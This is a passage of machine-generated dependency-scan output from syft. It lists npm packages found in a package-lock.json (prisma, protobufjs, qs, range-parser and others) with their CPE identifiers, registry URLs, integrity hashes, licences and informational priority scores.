cpe:2.3:a:postcss-value:postcss-value-parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-value:postcss_value_parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_value:postcss-value-parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_value:postcss_value_parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss-value-parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss_value_parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/postcss-value-parser@4.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz + integrity: sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f330341278522955 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: prisma 5.22.0' + title: prisma 5.22.0 + description: 'Package discovered: prisma 5.22.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f76e4353403c9c3d + name: prisma + version: 5.22.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:prisma:prisma:5.22.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/prisma@5.22.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/prisma/-/prisma-5.22.0.tgz + integrity: sha512-vtpjW3XuYCSnMsNVBjLMNkTj6OZbudcPPTPYHqX0CJfpcdWciI1dM8uHETwmDxxiqEwCIE6WvXucWUetJgfu/A== + dependencies: + '@prisma/engines': 5.22.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9fc67df1307075e9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: process-nextick-args 2.0.1' + title: process-nextick-args 2.0.1 + description: 'Package discovered: process-nextick-args 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: da765da41b164754 + name: process-nextick-args + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:process-nextick-args:process-nextick-args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:process-nextick-args:process_nextick_args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:process_nextick_args:process-nextick-args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:process_nextick_args:process_nextick_args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:process-nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:process-nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:process_nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:process_nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:process:process-nextick-args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:process:process_nextick_args:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/process-nextick-args@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz + integrity: sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b351d49072943449 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: prop-types 15.8.1' + title: prop-types 15.8.1 + description: 'Package discovered: prop-types 15.8.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2485766b0114da33 + name: prop-types + version: 15.8.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:prop-types:prop-types:15.8.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:prop-types:prop_types:15.8.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:prop_types:prop-types:15.8.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:prop_types:prop_types:15.8.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:prop:prop-types:15.8.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:prop:prop_types:15.8.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/prop-types@15.8.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz + integrity: sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg== + dependencies: + loose-envify: ^1.4.0 + object-assign: ^4.1.1 + react-is: ^16.13.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: acadb8b8517c78d3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: proto-list 1.2.4' + title: proto-list 1.2.4 + description: 'Package discovered: proto-list 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 685c0e3e50c6553a + name: proto-list + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:proto-list:proto-list:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto-list:proto_list:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto_list:proto-list:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto_list:proto_list:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto:proto-list:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto:proto_list:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/proto-list@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz + integrity: sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 44c7a82b0c4aafcf + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: proto3-json-serializer 2.0.2' + title: proto3-json-serializer 2.0.2 + description: 'Package discovered: proto3-json-serializer 2.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5add12638aea166c + name: proto3-json-serializer + version: 2.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:proto3-json-serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto3-json-serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto3_json_serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto3_json_serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto3-json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto3-json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto3_json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto3_json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto3:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proto3:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/proto3-json-serializer@2.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz + integrity: sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ== + dependencies: + protobufjs: ^7.2.5 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f337eadf0901e415 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: protobufjs 7.5.6' + title: protobufjs 7.5.6 + description: 'Package discovered: protobufjs 7.5.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a5b5323abf9aae9f + name: protobufjs + version: 7.5.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:protobufjs_project:protobufjs:7.5.6:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/protobufjs@7.5.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.6.tgz + integrity: sha512-M71sTMB146U3u0di3yup8iM+zv8yPRNQVr1KK4tyBitl3qFvEGucq/rGDRShD2rsJhtN02RJaJ7j5X5hmy8SJg== + dependencies: + '@protobufjs/aspromise': ^1.1.2 + '@protobufjs/base64': ^1.1.2 + '@protobufjs/codegen': ^2.0.5 + '@protobufjs/eventemitter': ^1.1.0 + '@protobufjs/fetch': ^1.1.0 + '@protobufjs/float': ^1.0.2 + '@protobufjs/inquire': ^1.1.1 + '@protobufjs/path': ^1.1.2 + '@protobufjs/pool': ^1.1.0 + '@protobufjs/utf8': ^1.1.1 + '@types/node': '>=13.7.0' + long: ^5.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d4455e8054d4e780 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: proxy-addr 2.0.7' + title: proxy-addr 2.0.7 + description: 'Package discovered: proxy-addr 2.0.7' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ce10aea6db36304a + name: proxy-addr + version: 2.0.7 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:proxy-addr:proxy-addr:2.0.7:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy-addr:proxy_addr:2.0.7:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy_addr:proxy-addr:2.0.7:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy_addr:proxy_addr:2.0.7:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy:proxy-addr:2.0.7:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy:proxy_addr:2.0.7:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/proxy-addr@2.0.7 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz + integrity: sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg== + dependencies: + forwarded: 0.2.0 + ipaddr.js: 1.9.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4788b4003cbe678a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: proxy-from-env 2.1.0' + title: proxy-from-env 2.1.0 + description: 'Package discovered: proxy-from-env 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d0670890e90b35a8 + name: proxy-from-env + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:proxy-from-env:proxy-from-env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy-from-env:proxy_from_env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy_from_env:proxy-from-env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy_from_env:proxy_from_env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy-from:proxy-from-env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy-from:proxy_from_env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy_from:proxy-from-env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy_from:proxy_from_env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy:proxy-from-env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:proxy:proxy_from_env:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/proxy-from-env@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-2.1.0.tgz + integrity: sha512-cJ+oHTW1VAEa8cJslgmUZrc+sjRKgAKl3Zyse6+PV38hZe/V6Z14TbCuXcan9F9ghlz4QrFr2c92TNF82UkYHA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6d2187ed4d7bb00d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: qrcode 1.5.4' + title: qrcode 1.5.4 + description: 'Package discovered: qrcode 1.5.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9616afcfad81bbcd + name: qrcode + version: 1.5.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:qrcode:qrcode:1.5.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/qrcode@1.5.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/qrcode/-/qrcode-1.5.4.tgz + integrity: sha512-1ca71Zgiu6ORjHqFBDpnSMTR2ReToX4l1Au1VFLyVeBTFavzQnv5JxMFr3ukHVKpSrSA2MCk0lNJSykjUfz7Zg== + dependencies: + dijkstrajs: ^1.0.1 + pngjs: ^5.0.0 + yargs: ^15.3.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: cd93e60074e9daeb + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: qs 6.14.2' + title: qs 6.14.2 + description: 'Package discovered: qs 6.14.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: baa7b01807110a4c + name: qs + version: 6.14.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:qs_project:qs:6.14.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/qs@6.14.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/qs/-/qs-6.14.2.tgz + integrity: sha512-V/yCWTTF7VJ9hIh18Ugr2zhJMP01MY7c5kh4J870L7imm6/DIzBsNLTXzMwUA3yZ5b/KBqLx8Kp3uRvd7xSe3Q== + dependencies: + side-channel: ^1.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4d4da368c4cb9e85 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: qs 6.15.1' + title: qs 6.15.1 + description: 'Package discovered: qs 6.15.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 994fc27bb4c175c9 + name: qs + version: 6.15.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:qs_project:qs:6.15.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/qs@6.15.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/qs/-/qs-6.15.1.tgz + integrity: sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg== + dependencies: + side-channel: ^1.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 53a30fbc709808bd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: queue 6.0.2' + title: queue 6.0.2 + description: 'Package discovered: queue 6.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3d2cabf593c9f69a + name: queue + version: 6.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:queue:queue:6.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/queue@6.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/queue/-/queue-6.0.2.tgz + integrity: sha512-iHZWu+q3IdFZFX36ro/lKBkSvfkztY5Y7HMiPlOUjhupPcG2JMfst2KKEpu5XndviX/3UhFbRngUPNKtgvtZiA== + dependencies: + inherits: ~2.0.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ef5b9014e52d743a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: queue-microtask 1.2.3' + title: queue-microtask 1.2.3 + description: 'Package discovered: queue-microtask 1.2.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 254ae16d84fc4780 + name: queue-microtask + version: 1.2.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:queue-microtask:queue-microtask:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:queue-microtask:queue_microtask:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:queue_microtask:queue-microtask:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:queue_microtask:queue_microtask:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:queue:queue-microtask:1.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:queue:queue_microtask:1.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/queue-microtask@1.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz + integrity: sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: cbdbab233debac3e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: range-parser 1.2.1' + title: range-parser 1.2.1 + description: 'Package discovered: range-parser 1.2.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4bcca27d3d8ccfdd + name: range-parser + version: 1.2.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:range-parser:range-parser:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:range-parser:range_parser:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:range_parser:range-parser:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:range_parser:range_parser:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:range:range-parser:1.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:range:range_parser:1.2.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/range-parser@1.2.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz + integrity: sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: 